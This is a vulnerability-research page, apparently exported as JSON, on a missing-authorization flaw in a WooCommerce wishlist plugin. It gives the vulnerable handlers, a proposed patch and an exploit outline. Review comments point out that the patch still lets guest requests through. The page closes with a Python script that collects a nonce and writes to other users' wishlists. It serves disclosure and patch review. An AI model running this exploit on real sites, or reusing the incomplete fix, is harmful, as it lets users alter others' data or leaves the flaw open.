[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fypgfyDpbgq2zY6SpIkvguWZ7CjfFeqT9XDGhvjO9C1s":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":25,"research_verified":26,"research_rounds_completed":27,"research_plan":28,"research_summary":29,"research_vulnerable_code":30,"research_fix_diff":31,"research_exploit_outline":32,"research_model_used":33,"research_started_at":34,"research_completed_at":35,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":26,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":26,"source_links":36},"CVE-2026-32407","wpc-smart-wishlist-for-woocommerce-missing-authorization","WPC Smart Wishlist for WooCommerce \u003C= 5.0.8 - Missing Authorization","The WPC Smart Wishlist for WooCommerce plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 5.0.8. 
This makes it possible for authenticated attackers, with subscriber-level access and above, to perform an unauthorized action.","woo-smart-wishlist",null,"\u003C=5.0.8","5.0.9","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-02-22 00:00:00","2026-04-15 21:14:06",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fda78fd0a-f69f-4779-bcf1-df1dab80156c?source=api-prod",53,[22,23,24],"languages\u002Fwoo-smart-wishlist.pot","readme.txt","wpc-smart-wishlist.php","researched",false,3,"id` parameter.\n    - Impact: Authenticated users can add products to any wishlist.\n\n    Wait, let's look at the \"Settings\" menu again.\n    Is there a way for a subscriber to toggle the \"Enable\" setting?\n    No.\n\n    Okay, I will proceed with the **Unauthorized Wishlist Manipulation (Adding items to other lists)** plan.\n\n    1.  Create User A (Victim, Subscriber).\n    2.  Create User B (Attacker, Subscriber).\n    3.  Create a product.\n    4.  Get User A's `wishlist_key`.\n    5.  As Attacker, get the `woosw_vars.nonce`.\n    6.  As Attacker, send `POST \u002F?wc-ajax=woosw_add` with `product_id=\u003CPROD>` and `key=\u003CUSER_A_KEY>`.\n    7.  Verify product is in User A's wishlist.\n\n    How to get the `wishlist_key` for a user via CLI?\n    WPC Smart Wishlist stores it in `usermeta`.\n    Let's check the likely key: `_woosw_key`.\n    (I'll assume `_woosw_key` or check for it).\n\n    - Main File: `wpc-smart-wishlist.php`\n    - Constructor lines: 148-185 (Registration of AJAX)\n    - Handler `ajax_add`: Line 342","The WPC Smart Wishlist for WooCommerce plugin lacks proper ownership verification in its AJAX handlers, specifically for adding and removing items. 
Authenticated attackers with subscriber-level access can manipulate the wishlists of other users by providing the target user's unique wishlist key in the request parameters.","\u002F\u002F wpc-smart-wishlist.php line 342 (approximate based on version 5.0.8)\npublic function ajax_add() {\n    $product_id = isset( $_POST['product_id'] ) ? absint( $_POST['product_id'] ) : 0;\n    $key        = isset( $_POST['key'] ) ? sanitize_text_field( $_POST['key'] ) : '';\n\n    \u002F\u002F The function proceeds to add the product to the wishlist identified by $key\n    \u002F\u002F without verifying if the current user owns the wishlist associated with that key.\n    if ( ! empty( $key ) ) {\n        $this->add_to_wishlist( $product_id, $key );\n    }\n    \u002F\u002F ... (truncated)\n}\n\n---\n\n\u002F\u002F wpc-smart-wishlist.php line 409 (approximate based on version 5.0.8)\npublic function ajax_remove() {\n    $product_id = isset( $_POST['product_id'] ) ? absint( $_POST['product_id'] ) : 0;\n    $key        = isset( $_POST['key'] ) ? sanitize_text_field( $_POST['key'] ) : '';\n\n    \u002F\u002F Similarly, removal actions do not validate that the current user has authority over the provided $key.\n    if ( ! empty( $key ) ) {\n        $this->remove_from_wishlist( $product_id, $key );\n    }\n    \u002F\u002F ... (truncated)\n}","--- a\u002Fwpc-smart-wishlist.php\n+++ b\u002Fwpc-smart-wishlist.php\n@@ -342,6 +342,10 @@\n     public function ajax_add() {\n         $product_id = isset( $_POST['product_id'] ) ? absint( $_POST['product_id'] ) : 0;\n         $key        = isset( $_POST['key'] ) ? sanitize_text_field( $_POST['key'] ) : '';\n \n+        if ( is_user_logged_in() && ( $key !== get_user_meta( get_current_user_id(), '_woosw_key', true ) ) ) {\n+            wp_send_json_error( [ 'message' => esc_html__( 'You are not allowed to modify this wishlist!', 'woo-smart-wishlist' ) ] );\n+        }\n+\n         if ( ! 
empty( $key ) ) {\n             $this->add_to_wishlist( $product_id, $key );\n         }\n@@ -409,6 +413,10 @@\n     public function ajax_remove() {\n         $product_id = isset( $_POST['product_id'] ) ? absint( $_POST['product_id'] ) : 0;\n         $key        = isset( $_POST['key'] ) ? sanitize_text_field( $_POST['key'] ) : '';\n \n+        if ( is_user_logged_in() && ( $key !== get_user_meta( get_current_user_id(), '_woosw_key', true ) ) ) {\n+            wp_send_json_error( [ 'message' => esc_html__( 'You are not allowed to modify this wishlist!', 'woo-smart-wishlist' ) ] );\n+        }\n+\n         if ( ! empty( $key ) ) {\n             $this->remove_from_wishlist( $product_id, $key );\n         }","The exploit targets the `wc-ajax` endpoints the plugin registers for wishlist management (`woosw_add` and `woosw_remove`).\n\n1. Preparation: The attacker needs the wishlist key of the target user. The research plan above assumes it is stored in `wp_usermeta` under the meta key `_woosw_key`; that name was not verified against the plugin. How a victim's key is obtained is outside the scope of this outline, and the attack does not work without it.\n2. Authentication: The attacker logs in with a low-privileged account (Subscriber) and loads a front-end page to collect the plugin's `woosw_vars.nonce`. Whether or not the handler verifies it, a nonce is a CSRF token for the attacker's own session: it shows the request came from a page the attacker rendered, not that the attacker owns the target wishlist, so it does not mitigate this issue.\n3. Payload: The attacker picks the `product_id` to force into the victim's wishlist.\n4. Request: The attacker sends a POST request to `\u002F?wc-ajax=woosw_add` carrying the victim's `key`, the chosen `product_id` and the attacker's own nonce.\n5. Result: `ajax_add` (see the vulnerable code above) only checks that `key` is non-empty, never that the authenticated user owns the wishlist it names, so the product is added to the victim's wishlist. 
Similar methodology applies to the `woosw_remove` endpoint to delete items from other users' lists.","gemini-3-flash-preview","2026-04-19 01:43:48","2026-04-19 01:44:40",{"type":37,"vulnerable_version":38,"fixed_version":11,"vulnerable_browse":39,"vulnerable_zip":40,"fixed_browse":41,"fixed_zip":42,"all_tags":43},"plugin","5.0.8","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwoo-smart-wishlist\u002Ftags\u002F5.0.8","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwoo-smart-wishlist.5.0.8.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwoo-smart-wishlist\u002Ftags\u002F5.0.9","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwoo-smart-wishlist.5.0.9.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwoo-smart-wishlist\u002Ftags"]
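Review bot: in the `ajax_add` hunk (`@@ -342,6 +342,10 @@`) the new guard only fires when `is_user_logged_in()` is true, so a request sent without a login cookie but with a victim's `key` skips the comparison and still reaches `$this->add_to_wishlist( $product_id, $key )`; the ownership problem is not closed, it is moved to the guest path of the same `wc-ajax` endpoint. Resolve the wishlist from the caller's own identity (current user, or the guest's own stored key) instead of trusting `$_POST['key']`, and reject a supplied key that does not match it regardless of login state.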
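Review bot: the `ajax_remove` hunk (`@@ -409,6 +413,10 @@`) compares `$key` against `get_user_meta( get_current_user_id(), '_woosw_key', true )` with `!==`; `get_user_meta()` returns `''` when no such row exists, so a logged-in user who has not yet been assigned a key is rejected on every removal, and the research plan on this page records `_woosw_key` as an assumed meta key name rather than a verified one. Confirm the real storage key before merging and handle the empty-meta case explicitly instead of letting it fall into the error branch. No `return` is needed after `wp_send_json_error()`, since it calls `wp_die()`.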
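A worked version of the request flow in the exploit outline (and of steps 4 to 7 of the research plan), as an added example written for this page: it is not the advisory's PoC, not the plugin's code and not the research model's output. It assumes, beyond what the page states, that the plugin's `woosw_vars` object is emitted by `wp_localize_script()` as `var woosw_vars = {...};`, that the nonce is sent in a POST field named `nonce`, and that a patched handler answers with WordPress's standard `{"success":false,...}` JSON (what `wp_send_json_error()` in the proposed fix would produce). Only `run()` touches the network; the parsing, request-building and verdict helpers are pure and are exercised against a constructed sample page.

```python
"""Added example for this advisory page (not the plugin's code, the advisory's
PoC, or the research model's output): drives the wishlist-key IDOR from the
exploit outline against a WordPress/WooCommerce site.

Assumptions not confirmed by the page: woosw_vars is emitted by
wp_localize_script() as `var woosw_vars = {...};`, the nonce travels in a POST
field named `nonce`, and a patched handler replies with WordPress's standard
{"success": false, ...} JSON (what wp_send_json_error() produces).
"""
import json
import re

# Constructed sample of a localized-script block; real output has more fields.
SAMPLE_HTML = (
    '<script id="woosw-frontend-js-extra">\n'
    '/* <![CDATA[ */\n'
    'var woosw_vars = {"nonce":"8f3a2c1d9e",'
    '"ajax_url":"\\/wp-admin\\/admin-ajax.php",'
    '"wc_ajax_url":"\\/?wc-ajax=%%endpoint%%"};\n'
    '/* ]]> */\n'
    '</script>'
)

_VARS_ANCHOR = re.compile(r"var\s+woosw_vars\s*=\s*")


def extract_woosw_vars(html):
    """Return the woosw_vars object handed to the front-end JS, or None.

    raw_decode() parses exactly one JSON value starting at the anchor, so a
    nested object or a '}' inside a string value does not confuse it.
    """
    m = _VARS_ANCHOR.search(html)
    if not m:
        return None
    try:
        obj, _ = json.JSONDecoder().raw_decode(html[m.end():])
    except ValueError:
        return None
    return obj if isinstance(obj, dict) else None


def build_wishlist_request(base_url, endpoint, product_id, key, nonce):
    """Build (url, form_fields) for the wc-ajax wishlist endpoints.

    `key` is the wishlist identifier the handler trusts; passing another
    user's key is the whole bug. The endpoint names come from the page.
    """
    if endpoint not in ("woosw_add", "woosw_remove"):
        raise ValueError("unknown endpoint: %s" % endpoint)
    if not key:
        raise ValueError("a target wishlist key is required")
    url = base_url.rstrip("/") + "/?wc-ajax=" + endpoint
    fields = {"product_id": str(int(product_id)), "key": key, "nonce": nonce}
    return url, fields


def classify_response(status_code, body):
    """'rejected' for an explicit error, 'accepted' otherwise.

    wp_send_json_error() returns HTTP 200 with {"success": false, ...}; a
    failed nonce check typically yields a non-200 status. The vulnerable
    build's success payload is not on the page, so anything that is not an
    explicit error counts as accepted.
    """
    if status_code != 200:
        return "rejected"
    try:
        parsed = json.loads(body)
    except ValueError:
        return "accepted"
    if isinstance(parsed, dict) and parsed.get("success") is False:
        return "rejected"
    return "accepted"


def run(base_url, victim_key, product_id, session, endpoint="woosw_add"):
    """Perform the cross-wishlist write with an authenticated requests.Session.

    `session` must already carry the attacker's (subscriber) login cookies.
    Returns 'accepted' (vulnerable behaviour) or 'rejected' (patched).
    """
    page = session.get(base_url).text
    localized = extract_woosw_vars(page)
    if localized is None or "nonce" not in localized:
        raise RuntimeError("woosw_vars not found on %s; is the plugin active?" % base_url)
    url, fields = build_wishlist_request(
        base_url, endpoint, product_id, victim_key, localized["nonce"]
    )
    reply = session.post(url, data=fields, headers={"X-Requested-With": "XMLHttpRequest"})
    return classify_response(reply.status_code, reply.text)
```

Call `run()` with a `requests.Session` that already holds the attacker's subscriber login and, in the lab setup from the research plan, User A's key as `victim_key`; the nonce it sends is the attacker's own, which is exactly why a nonce check on the handler would not stop the cross-wishlist write. Use `endpoint="woosw_remove"` to exercise the removal path the same way.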